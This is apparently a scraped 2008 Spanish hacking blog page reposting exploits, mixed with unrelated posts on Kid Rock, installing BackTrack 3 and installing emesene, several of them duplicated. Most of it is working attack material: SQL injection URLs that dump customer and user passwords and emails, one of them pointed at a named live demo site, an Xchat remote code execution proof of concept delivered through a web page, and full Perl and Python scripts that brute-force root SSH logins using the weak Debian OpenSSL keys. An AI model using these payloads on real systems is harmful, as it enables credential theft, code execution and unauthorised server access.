## AUTHOR : JuDge
## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com
## Script WebSite:http://www.eshop100.co.uk
##Dork::)
##DescRipTiON: pull customers info from database
##EXPLOITS:
www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "AcmlmBoard v1.A2"
#
##
###
##
#
#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################
30/06/08
28/06/08
video en YouTube, donde invita a descargar ilegalmente música
Kid Rock ha publicado un video en YouTube, donde invita a descargar ilegalmente música - o en sus propias palabras, a robar música.
Como si lo anterior no fuera suficiente, luego exhorta al público a robar todo lo que se le antoje; automóviles, gasolina, música y películas. “Todo lo que necesites".
aqui al link: KID ROCK --> roba todo lo que puedas
Como si lo anterior no fuera suficiente, luego exhorta al público a robar todo lo que se le antoje; automóviles, gasolina, música y películas. “Todo lo que necesites".
aqui al link: KID ROCK --> roba todo lo que puedas
27/06/08
Una Guia Linuxera, Para un Windolero
Hola que tal, navegando ayer por el foro de elhacker me encontré esta guía para los novatos o como el titulo lo dice para un wuindulero =) bueno e aquí el link
Una Guia Linuxera, Para un Windolero
Una Guia Linuxera, Para un Windolero
23/06/08
Como Instalar Back|Track 3
Primero que nada tienes que tener lla echa una particion. Con 4 GB es mas que suficiente. Corremos el live cd de bactrac3 y abrimos una shell y comenzamos
bt~#mkdir /mnt/backtrack3 ---> creamos una carmeta dentro /mnt
bt~#mount /dev/sda10 /mnt/backtrack3/ --> montamos la particion donde queremos instalar /dev/sda10
bt~#mkdir /mnt/backtrack3/boot/ ---> creamos otro directorio
bt~#cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/ ---> instalamos tardara unos minutos
####----> despues de que termine con la instalacion terminamos con esto. -----------####
bt~#mkdir /mnt/backtrack3/{mnt,proc,sys,tmp}
bt~#mount --bind /dev/ /mnt/backtrack3/dev/
bt~#mount -t proc proc /mnt/backtrack3/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack3/boot/
Para agregarlo al grub en mi cas solo edite el archivo menu.lst de mi debian.
bt ~ # fdisk -l
Disk /dev/sda: 60.0 GB, 60011642880 bytes
255 heads, 63 sectors/track, 7296 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/sda1 * 1 34 273073+ 83 Linux
/dev/sda2 35 7296 58332015 5 Extended
/dev/sda5 35 642 4883728+ 83 Linux
/dev/sda6 643 1007 2931831 83 Linux
/dev/sda7 1008 1337 2650693+ 82 Linux swap
/dev/sda8 1338 1386 393561 83 Linux
/dev/sda9 1387 6019 37214541 83 Linux
/dev/sda10 6020 7296 10257471 83 Linux
Disk /dev/sdb: 123.5 GB, 123522416640 bytes
255 heads, 63 sectors/track, 15017 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/sdb1 * 1 15017 120624021 7 HPFS/NTFS
como podran ver fue en la /dev/sda10 donde instale el back|track3
entonses:
Entre en el archivo menu.lst de debian y lo edite
#nano /boot/grub/menu.lst
title Back|track3
root (hd0,9)
kernel /boot/vmlinuz root=/dev/sda10 ro
con eso fue mas que suficiente para tener back|track3 en mi HD.
aqui el link para descargar BACK|TRACK3
bt~#mkdir /mnt/backtrack3 ---> creamos una carmeta dentro /mnt
bt~#mount /dev/sda10 /mnt/backtrack3/ --> montamos la particion donde queremos instalar /dev/sda10
bt~#mkdir /mnt/backtrack3/boot/ ---> creamos otro directorio
bt~#cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/ ---> instalamos tardara unos minutos
####----> despues de que termine con la instalacion terminamos con esto. -----------####
bt~#mkdir /mnt/backtrack3/{mnt,proc,sys,tmp}
bt~#mount --bind /dev/ /mnt/backtrack3/dev/
bt~#mount -t proc proc /mnt/backtrack3/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack3/boot/
Para agregarlo al grub en mi cas solo edite el archivo menu.lst de mi debian.
bt ~ # fdisk -l
Disk /dev/sda: 60.0 GB, 60011642880 bytes
255 heads, 63 sectors/track, 7296 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/sda1 * 1 34 273073+ 83 Linux
/dev/sda2 35 7296 58332015 5 Extended
/dev/sda5 35 642 4883728+ 83 Linux
/dev/sda6 643 1007 2931831 83 Linux
/dev/sda7 1008 1337 2650693+ 82 Linux swap
/dev/sda8 1338 1386 393561 83 Linux
/dev/sda9 1387 6019 37214541 83 Linux
/dev/sda10 6020 7296 10257471 83 Linux
Disk /dev/sdb: 123.5 GB, 123522416640 bytes
255 heads, 63 sectors/track, 15017 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Device Boot Start End Blocks Id System
/dev/sdb1 * 1 15017 120624021 7 HPFS/NTFS
como podran ver fue en la /dev/sda10 donde instale el back|track3
entonses:
Entre en el archivo menu.lst de debian y lo edite
#nano /boot/grub/menu.lst
title Back|track3
root (hd0,9)
kernel /boot/vmlinuz root=/dev/sda10 ro
con eso fue mas que suficiente para tener back|track3 en mi HD.
aqui el link para descargar BACK|TRACK3
18/06/08
Instalar emesene
emsn es un cliente de mensageria similar al msn. la verdad en lo personal aun prefiero pidgin pero pues siempre hay mas altertativas que probar.
Primero editamos nuestro sources.list
#pico /etc/apt/sources.list
Y agregamos los repos.
deb http://apt.emesene.org/ ./
deb-src http://apt.emesene.org/ ./
haora.
#apt-get update
y haora instalamos.
#apt-get install emesene
Y listo.
Primero editamos nuestro sources.list
#pico /etc/apt/sources.list
Y agregamos los repos.
deb http://apt.emesene.org/ ./
deb-src http://apt.emesene.org/ ./
haora.
#apt-get update
y haora instalamos.
#apt-get install emesene
Y listo.
13/06/08
Xchat <= 2.8.7b Remote Code Execution
##################################################################################################################
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI Handler vulnerability but the approch is a bit different.
# We don't use any % or ../../../ as the others related bugs, just a single "
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an irc server , and also need IE * .
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
#
# Poc: this only launch the calc, sky is the limit passed this point.
html
head title Welcome to my personal website /title /head
body
script document.location='ircs://blabla@3.3.3.3" --command "shell calc"'/script
/body
/html
###http://www.milw0rm.com/#####
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI Handler vulnerability but the approch is a bit different.
# We don't use any % or ../../../ as the others related bugs, just a single "
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an irc server , and also need IE * .
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
#
# Poc: this only launch the calc, sky is the limit passed this point.
html
head title Welcome to my personal website /title /head
body
script document.location='ircs://blabla@3.3.3.3" --command "shell calc"'/script
/body
/html
###http://www.milw0rm.com/#####
11/06/08
02/06/08
Exploit SSH ---> OpenSSL
dandome unas visitas por milworm encontre :
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.
This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.
On an unpatched system, which doesn't need to be debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)
4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By mm@deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
mm@deadbeef.de
# milw0rm.com [2008-05-15]
Y TAMBIEN
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)
#!/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
############################################################################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
# http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
# - execute: python exploit.py (without parameters) to display the help
# - if the key is found, the script shows something like that:
# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################
import Queue
import os
import string
import time
from threading import Thread
import sys
#This class only has a boolean, which will be True if some thread find the key
class End():
def __init__(self):
self.end = False
def Finish(self):
self.end = True
def GetEnd(self):
return self.end
#This is the thread class
class Connection(Thread):
def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
Thread.__init__(self)
self.QueueDir = QueueDir
self.TheEnd = TheEnd
self.dir = dir
self.host = host
self.user = user
self.port = port
def run(self):
while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
key = self.QueueDir.get()
cmd = 'ssh -l ' + self.user
cmd = cmd + ' -p ' + self.port
cmd = cmd + ' -o PasswordAuthentication=no'
cmd = cmd + ' -i ' + self.dir + '/' + key
cmd = cmd + ' ' + self.host + ' exit; echo $?'
pin,pout,perr = os.popen3(cmd, 'r')
pin.close()
#To debug descoment the next line. This will show the errors reported by ssh
#print perr.read()
if pout.read().lstrip().rstrip() == '0':
self.TheEnd.Finish()
print ''
print 'Key Found in file: '+ key
print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
print ''
print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'
if len(sys.argv) < 4:
print './exploit.py [[port] [threads]]'
print ': Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print ': The victim host'
print ': The user of the victim host'
print ' [port]: The SSH port of the victim host (default 22)'
print ' [threads]: Number of threads (default 4) Too big numer is bad'
sys.exit(1)
dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]
if len(sys.argv) <= 4:
port='22'
threads=4
else:
if len(sys.argv) <=5:
port=sys.argv[4]
threads = 4
else:
port=sys.argv[4]
threads = sys.argv[5]
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()
for i in range(len(ListDir)):
if ListDir[i].find('.pub') == -1:
QueueDir.put(ListDir[i])
initsize = QueueDir.qsize()
tested = 0
for i in range(0,int(threads)):
Connection(QueueDir,TheEnd,dir,host,user,port).start()
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
time.sleep(5)
actsize = QueueDir.qsize()
speed = (initsize - tested - actsize)/5
tested = initsize - actsize
print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)
# milw0rm.com [2008-06-01]
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.
This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.
On an unpatched system, which doesn't need to be debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)
4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By mm@deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
mm@deadbeef.de
# milw0rm.com [2008-05-15]
Y TAMBIEN
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)
#!/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
############################################################################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
# http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
# - execute: python exploit.py (without parameters) to display the help
# - if the key is found, the script shows something like that:
# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################
import Queue
import os
import string
import time
from threading import Thread
import sys
#This class only has a boolean, which will be True if some thread find the key
class End():
def __init__(self):
self.end = False
def Finish(self):
self.end = True
def GetEnd(self):
return self.end
#This is the thread class
class Connection(Thread):
def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
Thread.__init__(self)
self.QueueDir = QueueDir
self.TheEnd = TheEnd
self.dir = dir
self.host = host
self.user = user
self.port = port
def run(self):
while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
key = self.QueueDir.get()
cmd = 'ssh -l ' + self.user
cmd = cmd + ' -p ' + self.port
cmd = cmd + ' -o PasswordAuthentication=no'
cmd = cmd + ' -i ' + self.dir + '/' + key
cmd = cmd + ' ' + self.host + ' exit; echo $?'
pin,pout,perr = os.popen3(cmd, 'r')
pin.close()
#To debug descoment the next line. This will show the errors reported by ssh
#print perr.read()
if pout.read().lstrip().rstrip() == '0':
self.TheEnd.Finish()
print ''
print 'Key Found in file: '+ key
print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
print ''
print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'
if len(sys.argv) < 4:
print './exploit.py
print '
print '
print '
print ' [port]: The SSH port of the victim host (default 22)'
print ' [threads]: Number of threads (default 4) Too big numer is bad'
sys.exit(1)
dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]
if len(sys.argv) <= 4:
port='22'
threads=4
else:
if len(sys.argv) <=5:
port=sys.argv[4]
threads = 4
else:
port=sys.argv[4]
threads = sys.argv[5]
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()
for i in range(len(ListDir)):
if ListDir[i].find('.pub') == -1:
QueueDir.put(ListDir[i])
initsize = QueueDir.qsize()
tested = 0
for i in range(0,int(threads)):
Connection(QueueDir,TheEnd,dir,host,user,port).start()
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
time.sleep(5)
actsize = QueueDir.qsize()
speed = (initsize - tested - actsize)/5
tested = initsize - actsize
print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)
# milw0rm.com [2008-06-01]
Suscribirse a:
Entradas (Atom)
